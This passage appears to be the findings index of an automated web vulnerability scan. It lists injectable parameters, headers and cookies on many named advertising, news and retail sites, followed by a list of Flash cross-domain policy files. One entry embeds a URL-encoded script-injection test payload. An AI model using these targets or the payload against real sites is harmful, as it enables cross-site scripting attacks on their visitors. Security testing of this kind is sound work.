5.100. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [ASID parameter]

5.101. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [PG parameter]

5.102. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 2]

5.103. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 3]

5.104. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [TargetID parameter]

5.105. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [UIT parameter]

5.106. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [name of an arbitrarily supplied request parameter]

5.107. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [&PID parameter]

5.108. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter]

5.109. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [AN parameter]

5.110. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [ASID parameter]

5.111. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [PG parameter]

5.112. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 2]

5.113. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [REST URL parameter 3]

5.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [TargetID parameter]

5.115. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [UIT parameter]

5.116. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [name of an arbitrarily supplied request parameter]

5.117. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [&PID parameter]

5.118. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click parameter]

5.119. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [AN parameter]

5.120. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [ASID parameter]

5.121. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [PG parameter]

5.122. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [TargetID parameter]

5.123. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [UIT parameter]

5.124. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [name of an arbitrarily supplied request parameter]

5.125. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [&PID parameter]

5.126. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [AN parameter]

5.127. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [ASID parameter]

5.128. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [PG parameter]

5.129. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 2]

5.130. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 3]

5.131. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [TargetID parameter]

5.132. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [UIT parameter]

5.133. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [click parameter]

5.134. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [name of an arbitrarily supplied request parameter]

5.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [&PID parameter]

5.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [AN parameter]

5.137. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [ASID parameter]

5.138. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [PG parameter]

5.139. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 2]

5.140. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 3]

5.141. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [TargetID parameter]

5.142. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [UIT parameter]

5.143. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [click parameter]

5.144. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [name of an arbitrarily supplied request parameter]

5.145. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [&PID parameter]

5.146. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [AN parameter]

5.147. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [ASID parameter]

5.148. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [PG parameter]

5.149. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 2]

5.150. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 3]

5.151. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [TargetID parameter]

5.152. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [UIT parameter]

5.153. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [click parameter]

5.154. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [name of an arbitrarily supplied request parameter]

5.155. http://alex-johnson.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.156. http://api.bing.com/qsonhs.aspx [&q parameter]

5.157. http://api.bing.com/qsonhs.aspx [q parameter]

5.158. http://ar.voicefive.com/b/rc.pli [func parameter]

5.159. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]

5.160. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]

5.161. http://athima-chansanchai.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.162. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.163. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.164. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.165. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.166. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.167. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.168. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.169. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.170. http://bodyodd.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.171. http://boyle.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.172. http://cartoonblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.173. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

5.174. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

5.175. http://cosmiclog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.176. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]

5.177. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]

5.178. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [c parameter]

5.179. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [name of an arbitrarily supplied request parameter]

5.180. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter]

5.181. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [q parameter]

5.182. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

5.183. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

5.184. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [l parameter]

5.185. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

5.186. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

5.187. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

5.188. http://digg.com/search [REST URL parameter 1]

5.189. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 2]

5.190. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 3]

5.191. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 4]

5.192. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45 [keywords parameter]

5.193. http://helenaspopkin.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.194. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.195. http://ingame.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.196. http://investing.money.redacted/investments/charts [Symbol parameter]

5.197. http://js.revsci.net/gateway/gw.js [csid parameter]

5.198. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

5.199. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

5.200. http://michaelwann.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.201. http://redacted/investor/charts/chartdl.aspx [symbol parameter]

5.202. http://redacted/investor/charts/chartdl.aspx [symbol parameter]

5.203. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]

5.204. http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420 [name of an arbitrarily supplied request parameter]

5.205. http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911 [name of an arbitrarily supplied request parameter]

5.206. http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911 [name of an arbitrarily supplied request parameter]

5.207. http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911 [name of an arbitrarily supplied request parameter]

5.208. http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911 [name of an arbitrarily supplied request parameter]

5.209. http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911 [name of an arbitrarily supplied request parameter]

5.210. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [GT1 parameter]

5.211. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [name of an arbitrarily supplied request parameter]

5.212. http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911 [name of an arbitrarily supplied request parameter]

5.213. http://openchannel.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.214. http://openchannel.msnbc.redacted/_vine/printer [path parameter]

5.215. http://photoblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.216. http://photoblog.msnbc.redacted/_vine/printer [path parameter]

5.217. http://polls.newsvine.com/favicon.ico [REST URL parameter 1]

5.218. http://recruiting.scout.com/a.z [c parameter]

5.219. http://recruiting.scout.com/a.z [c parameter]

5.220. http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter]

5.221. http://redtape.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.222. http://s18.sitemeter.com/js/counter.asp [site parameter]

5.223. http://s18.sitemeter.com/js/counter.js [site parameter]

5.224. http://suzanne-choney.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.225. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.226. http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch [name of an arbitrarily supplied request parameter]

5.227. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [name of an arbitrarily supplied request parameter]

5.228. http://technolog.msnbc.redacted/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook [name of an arbitrarily supplied request parameter]

5.229. http://technolog.msnbc.redacted/_nv/more/section/archive [REST URL parameter 3]

5.230. http://technolog.msnbc.redacted/_nv/more/section/archive [REST URL parameter 4]

5.231. http://technolog.msnbc.redacted/_vine/printer [path parameter]

5.232. http://technolog.msnbc.redacted/amazon [name of an arbitrarily supplied request parameter]

5.233. http://technolog.msnbc.redacted/app-store [name of an arbitrarily supplied request parameter]

5.234. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]

5.235. http://technolog.msnbc.redacted/ces-2011 [name of an arbitrarily supplied request parameter]

5.236. http://technolog.msnbc.redacted/citizen-gamer [name of an arbitrarily supplied request parameter]

5.237. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]

5.238. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]

5.239. http://technolog.msnbc.redacted/google [name of an arbitrarily supplied request parameter]

5.240. http://technolog.msnbc.redacted/internet [name of an arbitrarily supplied request parameter]

5.241. http://technolog.msnbc.redacted/ipad [name of an arbitrarily supplied request parameter]

5.242. http://technolog.msnbc.redacted/iphone [name of an arbitrarily supplied request parameter]

5.243. http://technolog.msnbc.redacted/itunes [name of an arbitrarily supplied request parameter]

5.244. http://technolog.msnbc.redacted/microsoft [name of an arbitrarily supplied request parameter]

5.245. http://technolog.msnbc.redacted/motion-controls [name of an arbitrarily supplied request parameter]

5.246. http://technolog.msnbc.redacted/online-privacy [name of an arbitrarily supplied request parameter]

5.247. http://technolog.msnbc.redacted/science [name of an arbitrarily supplied request parameter]

5.248. http://technolog.msnbc.redacted/social-media [name of an arbitrarily supplied request parameter]

5.249. http://technolog.msnbc.redacted/twitter [name of an arbitrarily supplied request parameter]

5.250. http://technolog.msnbc.redacted/verizon-wireless [name of an arbitrarily supplied request parameter]

5.251. http://technolog.msnbc.redacted/viral [name of an arbitrarily supplied request parameter]

5.252. http://technolog.msnbc.redacted/windows-phone-7 [name of an arbitrarily supplied request parameter]

5.253. http://technolog2.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.254. http://thelastword.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

5.255. http://thelastword.msnbc.redacted/_vine/printer [path parameter]

5.256. http://toddkenreck.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.257. http://redcated/APM/iview/139941180/direct [;wi.728;hi.90/01?click parameter]

5.258. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]

5.259. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]

5.260. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]

5.261. http://redcated/APM/iview/148848786/direct [REST URL parameter 4]

5.262. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]

5.263. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]

5.264. http://redcated/BEL/iview/262582811/direct [name of an arbitrarily supplied request parameter]

5.265. http://redcated/CNT/iview/286609711/direct [REST URL parameter 4]

5.266. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]

5.267. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]

5.268. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]

5.269. http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter]

5.270. http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter]

5.271. http://redcated/CNT/iview/287065754/direct [REST URL parameter 4]

5.272. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]

5.273. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]

5.274. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]

5.275. http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter]

5.276. http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter]

5.277. http://redcated/CNT/iview/299297287/direct [name of an arbitrarily supplied request parameter]

5.278. http://redcated/DEN/jview/286026710/direct [REST URL parameter 4]

5.279. http://redcated/DEN/jview/286026710/direct [click parameter]

5.280. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]

5.281. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]

5.282. http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter]

5.283. http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter]

5.284. http://redcated/NYC/iview/264935949/direct [REST URL parameter 4]

5.285. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]

5.286. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]

5.287. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]

5.288. http://redcated/PTR/jview/240321567/direct [wi.1;hi.1/01?relocate parameter]

5.289. http://redcated/ULA/iview/296652509/direct [/01?click parameter]

5.290. http://redcated/ULA/iview/296652509/direct [/01?click parameter]

5.291. http://redcated/ULA/iview/296652509/direct [REST URL parameter 4]

5.292. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]

5.293. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]

5.294. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]

5.295. http://wbenedetti.newsvine.com/ [name of an arbitrarily supplied request parameter]

5.296. http://www.bing.com/local/ypdefault.aspx [REST URL parameter 2]

5.297. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]

5.298. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]

5.299. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]

5.300. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]

5.301. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]

5.302. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

5.303. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

5.304. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]

5.305. http://www.co2stats.com/propres.php [name of an arbitrarily supplied request parameter]

5.306. http://www.co2stats.com/propres.php [s parameter]

5.307. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [REST URL parameter 4]

5.308. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [name of an arbitrarily supplied request parameter]

5.309. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 1]

5.310. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 2]

5.311. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 3]

5.312. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 4]

5.313. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 1]

5.314. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 2]

5.315. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 3]

5.316. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 4]

5.317. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 5]

5.318. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 1]

5.319. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 2]

5.320. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 3]

5.321. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 4]

5.322. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

5.323. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

5.324. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

5.325. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

5.326. http://www.foxsportsarizona.com/favicon.ico [REST URL parameter 1]

5.327. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [REST URL parameter 6]

5.328. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [blockID parameter]

5.329. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [feedID parameter]

5.330. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml [name of an arbitrarily supplied request parameter]

5.331. http://www.linkedin.com/cws/share-count [url parameter]

5.332. http://www.neudesicmediagroup.com/Advertising.aspx [site parameter]

5.333. https://www.newsvine.com/_nv/accounts/login [name of an arbitrarily supplied request parameter]

5.334. http://www.polls.newsvine.com/_vine/printer [path parameter]

5.335. http://www.reimage.com/includes/router_land.php [banner parameter]

5.336. http://www.reimage.com/includes/router_land.php [name of an arbitrarily supplied request parameter]

5.337. http://www.reimage.com/includes/router_land.php [tracking parameter]

5.338. http://www.scientificamerican.com/blog/observations/ [name of an arbitrarily supplied request parameter]

5.339. http://www.scout.com/a.z [blipid parameter]

5.340. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

5.341. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

5.342. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

5.343. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

5.344. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]

5.345. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]

5.346. http://msn.whitepages.com/ [Referer HTTP header]

5.347. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]

5.348. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]

5.349. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.350. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

5.351. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

5.352. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

5.353. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

5.354. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [ZEDOIDA cookie]

5.355. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

5.356. http://redacted/home.asp [name of an arbitrarily supplied request parameter]

5.357. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

5.358. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

5.359. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js [ruid cookie]

5.360. http://s18.sitemeter.com/js/counter.asp [IP cookie]

5.361. http://s18.sitemeter.com/js/counter.js [IP cookie]

5.362. http://redcated/PTR/jview/240321567/direct [AA002 cookie]

6. Flash cross-domain policy

6.1. http://ad.ae.doubleclick.net/crossdomain.xml

6.2. http://ajax.googleapis.com/crossdomain.xml

6.3. http://ak.c.ooyala.com/crossdomain.xml

6.4. http://amch.questionmarket.com/crossdomain.xml

6.5. http://ar.voicefive.com/crossdomain.xml

6.6. http://atl.whitepages.com/crossdomain.xml

6.7. http://b.rad.redacted/crossdomain.xml

6.8. http://b.voicefive.com/crossdomain.xml

6.9. http://b3.mookie1.com/crossdomain.xml

6.10. http://beta-ads.ace.advertising.com/crossdomain.xml

6.11. http://blstj.redacted/crossdomain.xml

6.12. http://college.scout.com/crossdomain.xml

6.13. http://collegebasketball.scout.com/crossdomain.xml

6.14. http://collegefootball.scout.com/crossdomain.xml

6.15. http://colstc.redacted/crossdomain.xml

6.16. http://colstj.redacted/crossdomain.xml

6.17. http://ec.redcated/crossdomain.xml

6.18. http://edge1.catalog.video.redacted/crossdomain.xml

6.19. http://edge2.catalog.video.redacted/crossdomain.xml

6.20. http://edge3.catalog.video.redacted/crossdomain.xml

6.21. http://edge4.catalog.video.redacted/crossdomain.xml

6.22. http://edge5.catalog.video.redacted/crossdomain.xml

6.23. http://i4.ytimg.com/crossdomain.xml

6.24. http://jcfootball.scout.com/crossdomain.xml

6.25. http://mlb.scout.com/crossdomain.xml

6.26. http://p.ace.advertising.com/crossdomain.xml

6.27. http://preps.scout.com/crossdomain.xml

6.28. http://profootball.scout.com/crossdomain.xml

6.29. http://r1.ace.advertising.com/crossdomain.xml

6.30. http://s0.2mdn.net/crossdomain.xml

6.31. http://sas.ooyala.com/crossdomain.xml

6.32. https://secure.scout.com/crossdomain.xml

6.33. http://stj.redacted/crossdomain.xml

6.34. http://whitepg-images.adbureau.net/crossdomain.xml

6.35. http://wrapper.g.redacted/crossdomain.xml

6.36. http://www.morningstar.com/crossdomain.xml

6.37. http://www.scout.com/crossdomain.xml

6.38. http://www.terra.com/crossdomain.xml

6.39. http://www.webmd.com/crossdomain.xml

6.40. http://ad.wsod.com/crossdomain.xml

6.41. http://admedia.wsod.com/crossdomain.xml

6.42. http://alex-johnson.newsvine.com/crossdomain.xml

6.43. http://athima-chansanchai.newsvine.com/crossdomain.xml

6.44. http://bodyodd.msnbc.redacted/crossdomain.xml

6.45. http://boyle.newsvine.com/crossdomain.xml

6.46. http://cartoonblog.msnbc.redacted/crossdomain.xml

6.47. http://cdn.modules.ooyala.com/crossdomain.xml

6.48. http://dateline.msnbc.com/crossdomain.xml

6.49. http://hardball.msnbc.com/crossdomain.xml

6.50. http://helenaspopkin.newsvine.com/crossdomain.xml

6.51. http://info.ooyala.com/crossdomain.xml

6.52. http://ingame.msnbc.redacted/crossdomain.xml

6.53. http://ingame.newsvine.com/crossdomain.xml

6.54. http://jp.video.redacted/crossdomain.xml

6.55. http://l.player.ooyala.com/crossdomain.xml

6.56. http://latino.aol.com/crossdomain.xml

6.57. http://latino.video.redacted/crossdomain.xml

6.58. http://live.newsvine.com/crossdomain.xml

6.59. http://michaelwann.newsvine.com/crossdomain.xml

6.60. http://money.aol.com/crossdomain.xml

6.61. http://msnbc.com/crossdomain.xml

6.62. http://msnbcmedia.redacted/crossdomain.xml

6.63. http://mtp.msnbc.com/crossdomain.xml

6.64. http://music.aol.com/crossdomain.xml

6.65. http://nbcsports.msnbc.com/crossdomain.xml

6.66. http://netscape.aol.com/crossdomain.xml

6.67. http://news.discovery.com/crossdomain.xml

6.68. http://nightly.msnbc.com/crossdomain.xml

6.69. http://ninemsn.video.redacted/crossdomain.xml

6.70. http://openchannel.msnbc.redacted/crossdomain.xml

